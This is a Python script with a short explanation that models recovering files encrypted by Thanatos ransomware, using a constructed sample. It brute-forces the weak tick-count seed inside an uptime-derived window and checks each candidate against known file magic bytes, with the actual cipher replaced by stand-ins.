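import hashlib
import hmac
import struct

BLOCK = 16                      # one AES block: enough to check the magic bytes
DAY_MS = 24 * 60 * 60 * 1000    # the uptime message is daily, so it bounds the window
RETRY_BACKOFF_MS = 60_000       # "previously successful SEED value (minus 60 secs)"

# Real magic bytes for some of the supported types; verification compares the
# first decrypted block against these.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".pdf": (b"%PDF",),
    ".zip": (b"PK\x03\x04",),
    ".7z":  (b"7z\xbc\xaf\x27\x1c",),
}


def original_ext(name):
    """'test.gif.lnk.THANATOS' -> '.lnk': the extension kept right before .THANATOS."""
    stem = name[:-len(".THANATOS")] if name.upper().endswith(".THANATOS") else name
    dot = stem.rfind(".")
    return stem[dot:].lower() if dot != -1 else ""


def derive_key(seed):
    """ASSUMPTION: stand-in derivation (the real one is not on the page). The
    property that matters is that a 32-bit tick count selects a 256-bit key."""
    return hashlib.sha256(struct.pack("<I", seed & 0xFFFFFFFF)).digest()


def _keystream(key, nblocks):
    """ASSUMPTION: HMAC-SHA256 counter keystream standing in for AES so the
    example needs no third-party crypto package."""
    return b"".join(hmac.new(key, struct.pack("<Q", i), hashlib.sha256).digest()[:BLOCK]
                    for i in range(nblocks))


def toy_crypt(data, seed):
    """XOR with the keystream; the same call encrypts and decrypts."""
    ks = _keystream(derive_key(seed), -(-len(data) // BLOCK))
    return bytes(a ^ b for a, b in zip(data, ks))


def looks_like(ext, first_block):
    return any(first_block.startswith(m) for m in MAGIC.get(ext, ()))


def seed_window(logged_uptime_ms, log_time_s, file_time_s):
    """Uptime when the file was encrypted is at least the value in the last
    daily Event Log message and at most that plus the wall-clock time elapsed
    until the .THANATOS file was written (capped at one day)."""
    elapsed_ms = int((file_time_s - log_time_s) * 1000)
    return logged_uptime_ms, logged_uptime_ms + max(0, min(elapsed_ms, DAY_MS))


def recover_seed(ciphertext, ext, start, end, previous_seed=None):
    """Count upward from `start`, decrypting only the first block per candidate.
    A seed that worked for an earlier file overrides `start` (minus 60 s),
    since files from one run share nearly the same tick count."""
    if previous_seed is not None:
        start = max(0, previous_seed - RETRY_BACKOFF_MS)
    first = ciphertext[:BLOCK]
    for seed in range(start, end + 1):
        if looks_like(ext, toy_crypt(first, seed)):
            return seed
    return None


def decrypt_file(name, ciphertext, start, end, previous_seed=None):
    """Returns (seed, plaintext), or (None, None) if no seed in the window verifies."""
    seed = recover_seed(ciphertext, original_ext(name), start, end, previous_seed)
    if seed is None:
        return None, None
    return seed, toy_crypt(ciphertext, seed)


# Constructed sample: two files "encrypted" 15 ms apart, as one malware run would.
SAMPLE_FILES = {
    "test.gif.THANATOS": toy_crypt(b"GIF89a" + bytes(40), 516031),
    "test.zip.THANATOS": toy_crypt(b"PK\x03\x04" + bytes(60), 516046),
}


if __name__ == "__main__":
    # Constructed timestamps: uptime 500000 ms logged 30 s before the files were written.
    start, end = seed_window(500_000, log_time_s=0.0, file_time_s=30.0)
    prev = None
    for name, ct in SAMPLE_FILES.items():
        seed, pt = decrypt_file(name, ct, start, end, prev)
        print(name, "-> seed", seed, "first bytes", pt[:6] if pt else None)
        prev = seed if seed is not None else prev
```

The window arithmetic is what turns the 2^32 worst case (about 12 hours at 100k tries per second) into the 24-hour-of-milliseconds case the README quotes (about 14 minutes); the second file in the sample is found after only a few thousand tries because the search restarts 60 seconds below the first file's seed.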